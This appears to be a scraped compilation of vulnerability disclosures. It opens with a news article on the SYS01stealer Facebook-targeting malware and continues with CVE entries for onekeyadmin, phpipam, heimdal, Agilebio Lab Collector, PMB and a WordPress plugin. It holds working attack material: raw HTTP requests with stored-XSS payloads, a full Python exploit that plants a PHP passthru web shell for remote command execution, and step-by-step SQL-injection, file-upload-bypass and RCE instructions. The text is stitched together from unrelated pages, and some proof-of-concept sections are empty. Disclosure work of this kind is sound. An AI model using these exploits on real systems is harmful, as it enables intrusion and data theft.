Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors.
"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure

Data Safety / Cyber Threat

Cybersecurity researchers have discovered a new information stealer dubbed **SYS01stealer** targeting critical government infrastructure employees, manufacturing companies, and other sectors.

"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News.

"The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information."

The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler.

However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actors managed to confuse attribution efforts and evade detection.

The attack chain, per Morphisec, commences when a victim is successfully lured into clicking on a URL from a fake Facebook profile or advertisement to download a ZIP archive that purports to be cracked software or adult-themed content.

Opening the ZIP file launches a based loader – typically a legitimate C# application – that's vulnerable to DLL side-loading, thereby making it possible to load a malicious dynamic link library (DLL) file alongside the app.

Some of the applications abused to side-load the rogue DLL are Western Digital's WDSyncService.exe and Garmin's ElevatedInstaller.exe. In some instances, the side-loaded DLL acts as a means to deploy Python and Rust-based intermediate executables.

Irrespective of the approach employed, all roads lead to the delivery of an installer that drops and executes the PHP-based SYS01stealer malware.

The stealer is engineered to harvest Facebook cookies from Chromium-based web browsers (e.g., Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi), exfiltrate the victim's Facebook information to a remote server, and download and run arbitrary files.

Discover the Latest Malware Evasion Tactics and Prevention Strategies

Ready to bust the 9 most dangerous myths about file-based attacks? Join our upcoming webinar and become a hero in the fight against patient zero infections and zero-day security events!

RESERVE YOUR SEAT

It's also equipped to upload files from the infected host to the command-and-control (C2) server, run commands sent by the server, and update itself when a new version is available.

The development comes as Bitdefender revealed a similar stealer campaign known as S1deload that's designed to hijack users' Facebook and YouTube accounts and leverage the compromised systems to mine cryptocurrency.

"DLL side-loading is a highly effective technique for tricking Windows systems into loading malicious code," Morphisec said.

"When an application loads in memory and search order is not enforced, the application loads the malicious file instead of the legitimate one, allowing threat actors to hijack legitimate, trusted, and even signed applications to load and execute malicious payloads."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：

<img src=1 onerror=alert("xss");>  
url  
http://192.168.3.129:8091/admin1#userGroup/index  
  
poc  
POST /admin1/userGroup/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 114  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/userGroup/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#userGroup/index

CVE-2023-26954: Backstage member grouping - add storage xss vulnerability · Issue #11 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#adminGroup/index

\`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":\[\],"theme":"template"}\`  

then you can view xss in  
url:  
http://192.168.3.129:8091/admin1#adminGroup/index

CVE-2023-26955: Background role management - there is a storage xss vulnerability in adding roles · Issue #6 · keheying/onekeyadmin

Cross-site Scripting (XSS) - Stored in GitHub repository phpipam/phpipam prior to v1.5.2.

CVE-2023-1212

SQL Injection in GitHub repository phpipam/phpipam prior to v1.5.2.

@@ -673,7 +673,7 @@ public function update\_custom\_field\_definition ($field) {  
\# set type definition and size of needed if($field\['fieldType'\]=="bool" || $field\['fieldType'\]=="text" || $field\['fieldType'\]=="date" || $field\['fieldType'\]=="datetime") { $field\['ftype'\] = $field\['fieldType'\]; } else { $field\['ftype'\] = $field\['fieldType'\]."(".$field\['fieldSize'\].")"; } else { $field\['ftype'\] = $field\['fieldType'\]."( :enumset )"; }  
\# default value null $field\['fieldDefault'\] = is\_blank($field\['fieldDefault'\]) ? NULL : $field\['fieldDefault'\]; @@ -709,6 +709,7 @@ public function update\_custom\_field\_definition ($field) { $params = array(); if (strpos($query, ":default")>0) $params\['default'\] = $field\['fieldDefault'\]; if (strpos($query, ":comment")>0) $params\['comment'\] = $field\['Comment'\]; if (strpos($query, ":enumset")>0) $params\['enumset'\] = $field\['fieldSize'\];  
\# execute try { $res = $this\->Database\->runQuery($query, $params); }

CVE-2023-1211: Bugfix: SQL injection in custom field enum/set types · phpipam/phpipam@16e7a94

The fix for CVE-2022-3437 included changing memcmp to be constant time and a workaround for a compiler bug by adding "!= 0" comparisons to the result of memcmp. When these patches were backported to the heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a logic inversion sneaked in causing the validation of message integrity codes in gssapi/arcfour to be inverted.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 8 Feb 2023 06:45:22 +0100
From: Helmut Grohne <helmut@...divi.de>
To: oss-security@...ts.openwall.com
Subject: \[vs\] heimdal: CVE-2022-45142: signature validation failure

Hi,

I am hereby publishing a vulnerability in heimdal backports by attaching
the exact mail sent to distros@...openwall.org last week.

----- Forwarded message from Helmut Grohne <helmut@...divi.de> -----

Date: Tue, 31 Jan 2023 15:52:58 +0100
From: Helmut Grohne <helmut@...divi.de>
To: distros@...openwall.org
Cc: heimdal-security@...mdal.team, Andrew Bartlett <abartlet@...ba.org>, Jeffrey Altman <jaltman@...ure-endpoints.com>, Joseph Sutton <josephsutton@...alyst.net.nz>, Nicolas Williams
	<nico@...sigma.com>, "Roberto C. Sánchez" <roberto@...exian.com>, Salvatore Bonaccorso <carnil@...ian.org>
Subject: \[vs\] heimdal: CVE-2022-45142: signature validation failure

(Resent with proper subject tag)

CVE-2022-3437 was a vulnerability affecting heimdal and samba. It was
fixed in both places. The fix included changing memcmp to be constant
time and a workaround for a compiler bug by adding "!= 0" comparisons to
the result of memcmp. When these patches were backported to the
heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a
logic inversion sneaked in causing the validation of message integrity
codes in gssapi/arcfour to be inverted.

This vulnerability does not affect samba nor the main heimdal branch and
only applies to backports. At least the 7.7.1 and 7.8.0 branches are
affected. CVE-2022-45142 has been assigned. All releases of Debian are
affected. At least one release of Fedora and Ubuntu are affected.

Timeline of events

2022-12-09 Issue discovered by me during backporting of patches
2022-12-09 Notified Debian security team
2022-12-09 Notified heimdal and samba
2022-12-09 Jeffrey Altman (heimdal) confirmed the problem
2022-12-10 Andrew Bartlett (samba) replied as not affected
2022-12-13 Patch v1
2022-12-13 Jeffrey Altman (heimdal) reviewed the patch
2022-12-13 Patch v2 (updated commit message)
2022-12-22 Last reply from heimdal (Jeffrey Altman) asking for more time
2022-12-25 Ping
2023-01-04 Ping
2023-01-13 Ping
2023-01-20 Ping and notified Ubuntu security team
2023-01-30 CVE-2022-45142 assigned
2023-01-31 Unilateral disclosure to distros mailinglist
2023-02-08 Proposed public disclosure to oss-sec

I would like to thank Salvatore Bonaccorso for handling most of the
coordination. Thanks also to go Jeffrey Altman and Andrew Bartlett for
their timely replies. My work on this issue is paid by Freexian SARL.

Patch below

Helmut

From: Helmut Grohne <helmut@...divi.de>
Subject: \[PATCH v3\] CVE-2022-45142: gsskrb5: fix accidental logic inversions

The referenced commit attempted to fix miscompilations with gcc-9 and
gcc-10 by changing \`memcmp(...)\` to \`memcmp(...) != 0\`. Unfortunately,
it also inverted the result of the comparison in two occasions. This
inversion happened during backporting the patch to 7.7.1 and 7.8.0.

Fixes: f6edaafcfefd ("gsskrb5: CVE-2022-3437 Use constant-time memcmp()
 for arcfour unwrap")
Signed-off-by: Helmut Grohne <helmut@...divi.de>
---
 lib/gssapi/krb5/arcfour.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

Changes since v1:
 \* Fix typo in commit message.
 \* Mention 7.8.0 in commit message. Thanks to Jeffrey Altman.

Changes since v2:
 \* Add CVE identifier.

diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c
index e838d007a..eee6ad72f 100644
--- a/lib/gssapi/krb5/arcfour.c
+++ b/lib/gssapi/krb5/arcfour.c
@@ -365,7 +365,7 @@ \_gssapi\_verify\_mic\_arcfour(OM\_uint32 \* minor\_status,
 	return GSS\_S\_FAILURE;
     }

-    cmp = (ct\_memcmp(cksum\_data, p + 8, 8) == 0);
+    cmp = (ct\_memcmp(cksum\_data, p + 8, 8) != 0);
     if (cmp) {
 	\*minor\_status = 0;
 	return GSS\_S\_BAD\_MIC;
@@ -730,7 +730,7 @@ OM\_uint32 \_gssapi\_unwrap\_arcfour(OM\_uint32 \*minor\_status,
 	return GSS\_S\_FAILURE;
     }

-    cmp = (ct\_memcmp(cksum\_data, p0 + 16, 8) == 0); /\* SGN\_CKSUM \*/
+    cmp = (ct\_memcmp(cksum\_data, p0 + 16, 8) != 0); /\* SGN\_CKSUM \*/
     if (cmp) {
 	\_gsskrb5\_release\_buffer(minor\_status, output\_message\_buffer);
 	\*minor\_status = 0;
--
2.38.1

----- End forwarded message -----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-45142: security - [vs] heimdal: CVE-2022-45142: signature validation failure

AgileBio Electronic Lab Notebook v4.234 was discovered to contain a local file inclusion vulnerability.

    # Exploit Title: Agilebio Lab Collector Electronic Lab Notebook Remote Code Execution# Date: 2023-02-28# Exploit Author: Anthony Cole# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/# Version: v4.234# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Tested on: PHP/MYSQL# CVE: CVE-2023-24217# Category: webapps#   # Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.#  from argparse import ArgumentParserfrom requests import Sessionfrom random import choicefrom string import ascii_lowercase, ascii_uppercase, digitsimport refrom base64 import b64encodefrom urllib.parse import quote_plussess:Session = Session()cookies = {}headers = {}state = {}def random_string(length:int) -> str:    return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))def login(base_url:str, username:str, password:str) -> bool:    data = {"login": username, "pass": password, "Submit":"", "action":"login"}    headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"    res = sess.post(f"{base_url}/login.php", data=data, headers=headers)    if("My profile" in res.text):        return res.text    else:        return None    def logout(base_url:str) -> bool:    headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"    sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers)def extract_field_value(contents, name):    value = re.findall(f'name="{name}" value="(.*)"', contents)    if(len(value)):        return value[0]    else:        return ""def get_profile(html:str):    return {        "contact_name": extract_field_value(html, "contact_name"),        "contact_lab": extract_field_value(html, "contact_lab"),        "contact_address": extract_field_value(html, "contact_address"),        "contact_city": extract_field_value(html, "contact_city"),        "contact_zip": extract_field_value(html, "contact_zip"),        "contact_country": extract_field_value(html, "contact_country"),        "contact_tel": extract_field_value(html, "contact_tel"),        "contact_email": extract_field_value(html, "contact_email")    }def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:    headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"    res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)    return Truedef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):    session_file = sess.cookies.get("PHPSESSID")    headers["Referer"] = f"{base_url}/login.php?%2F"    page = f"../../../../../..{session_path}/sess_{session_file}"    res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers)    return parse_output(res.text, wrapper)def exploit(args) -> None:    wrapper = random_string(5)    param = random_string(3)    html = login(args.url, args.login_username, args.login_password)        if(html == None):        print("unable to login")        return False        clean = get_profile(html)    data = get_profile(html)    tag = b64encode(wrapper.encode()).decode()    payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"            data["contact_name"] = payload #inject payload in name field    if(update_profile(args.url, wrapper, param, data)):        login(args.url, args.login_username, args.login_password) # reload the session w/ our payload        print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))        update_profile(args.url, wrapper, param, clean) # revert the profile        logout(args.url)    def parse_output(contents, wrapper) -> None:    matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)    if(len(matches)):        return matches[0]        return Nonedef main() -> None:    parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217")    parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")    parser.add_argument("--login-username", "-lu", required=True, help="Username.")    parser.add_argument("--login-password", "-lp", required=True, help="Password.")    parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")    parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.")        args = parser.parse_args()    if(args.url.endswith("/")):        args.url = args.url[:-1]    if(args.sessions.endswith("/")):        args.sessions = args.sessions[:-1]    exploit(args)    passif(__name__ == "__main__"):    main()

CVE-2023-24217: Agilebio Lab Collector 4.234 Remote Code Execution ≈ Packet Storm

PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950.php.

To search these vulnerabilities, I use the docker https://github.com/jperon/pmb/ and I simply change the URL in the Dockerfile to match the latest version (7.4.6).

**PMB 7.4.6 - Reflected XSS - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : XSS Reflected (Unauthenticated)
*   CWE-79

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in output. This allows an attacker to make a Reflected XSS on /pmb/admin/convert/export_z3950_new.php and /pmb/admin/convert/export_z3950.php endpoint via the same query parameter.

**Exploitation**

1.  Go to http://website.com/pmb/admin/convert/export_z3950_new.php or http://website.com/pmb/admin/convert/export_z3950.php
2.  Set parameter command to search and query to a JavaScript payload that end by =or (needed to bypass filter).
3.  Trigger your Reflected XSS: http://website.com/pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or

**PoC**

Here is an example with an alert box :

**Remediation**

Sanitize the query parameter with htlmentities function.

**PMB 7.4.6 - SQL Injection - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : SQL Injection (Unauthenticated)
*   CWE-89

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in an SQL Query. This allows an attacker to make a SQL Injection on /pmb/edit.php endpoint via the user parameter. This SQL Injection can lead to an account takeover if the SESSID cookie of the admin account is extracted.

**Exploitation**

1.  Go to http://website.com/pmb/edit.php
2.  Set parameter action=whatever&dest=TABLEAUCSV and user to your SQL payload %27%20OR%201=1;%23&password=password
3.  Trigger your SQL Injection: http://website.com/pmb/edit.php?action=whatever&dest=TABLEAUCSV&user=%27%20OR%201=1;%23&password=password

**PoC**

Here is an example of a simple bypass :

**Remediation**

Use prepared SQL query.

**PMB 7.4.6 - Unrestricted File Upload - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : Unrestricted File Upload (Authenticated)
*   CWE-434

**Description**

The web app allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment or overwrite configuration files. An attacker can host malicious files (ending with #data-section to make simple the exploitation of the RCE, see the next section).

**Exploitation**

1.  Go to http://website.com/pmb/camera_upload.php
2.  Send a POST request with the parameters upload_filename that is the name of the file you want to upload and imgBase64 the file content to upload.
3.  To bypass the filter in place (image checking), your file need to starts with GIF89a.

**PoC**

Here is an example of a file upload :

**Remediation**

Check the extension of each file. DO NOT trust user input, and generate a random name for each file uploaded.

**PMB 7.4.6 - Remote Code Execution - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : XSS Reflected (Authenticated)
*   CWE-94

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in exec function. This allows an attacker to execute a shell command through the parameter decompress.

**Exploitation**

1.  Go to http://website.com/pmb/admin/sauvegarde/restaure_act.php
2.  filename parameter need to point to a file that ends with #data-section. The web app use fopen so it's possible to pass a URL to this parameter.
3.  compress parameter need to be 1.
4.  decompress_type need to be external.
5.  decompress it's your shell command. That can the id command.

**PoC**

Here is an example of a blind RCE :

**Remediation**

Never trust user input and if possible do not decompress file with any external command that are controlled by user input.

**PMB 7.4.6 - Open Redirect - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : Open Redirect (Unauthenticated)
*   CWE-601

**Description**

The web app accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.

**Exploitation**

1.  Go to http://website.com/pmb/opac_css/pmb.php
2.  Set from parameter to empty.
3.  url parameter to the URL you want to redirect to.
4.  hash parameter to the md5 of your url parameter.

**PoC**

Here is an example of an Open Redirect :

**Remediation**

Check the domain with a whitelist.

**PMB 7.4.6 - SQL Injection - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : SQL Injection (Unauthenticated)
*   CWE-89

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in an SQL Query. This allows an attacker to make a SQL Injection on /pmb/opac_css/export.php endpoint via the notice_id parameter. This SQL Injection can lead to an account takeover if the SESSID cookie of the admin account can be extracted.

**Exploitation**

1.  Go to http://website.com/pmb/opac_css/export.php
2.  Set action parameter to export.
3.  notice_id parameter need to start by es after that you can add your SQL payload.

**PoC**

Here is an example of an SQL Injection :

**Remediation**

Use prepared SQL Query or add simple quote in this specific SQL query.

CVE-2023-24737: CVE/PMB at main · AetherBlack/CVE

An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:Remote code execution  
Vulnerability Details：  
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location  
Vulnerability occurs in  
app\\admin\\controller\\File#upload Although there are restrictions on ext  
  
but we found  
The app\\admin\\controller\\Config#update method can update the limit  
  
  
Vulnerability recurrence  
Conditions Admin  
poc  
The first step is to update the configuration to allow uploading php files  
\`POST /admin1/config/update HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 398  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/config/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW\_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj\_KGa\_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt\_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG\_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3\_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs\_j-o0joMSDe7mdS\_3rTvyQ5errD\_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E\_1-zYB117H7tFTA\_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 280  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP  
Accept: _/_  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/file/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="name"

templatex  
\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="file"; filename="1.php"  
Content-Type: text/php

\------WebKitFormBoundaryARP8fRC2kb4GP3oP--  
\`

CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin

A vulnerability classified as problematic has been found in woo-popup Plugin up to 1.2.2. This affects an unknown part of the file admin/class-woo-popup-admin.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is 7c76ac78f3e16015991b612ff4fa616af4ce9292. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222327.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

Tag

#php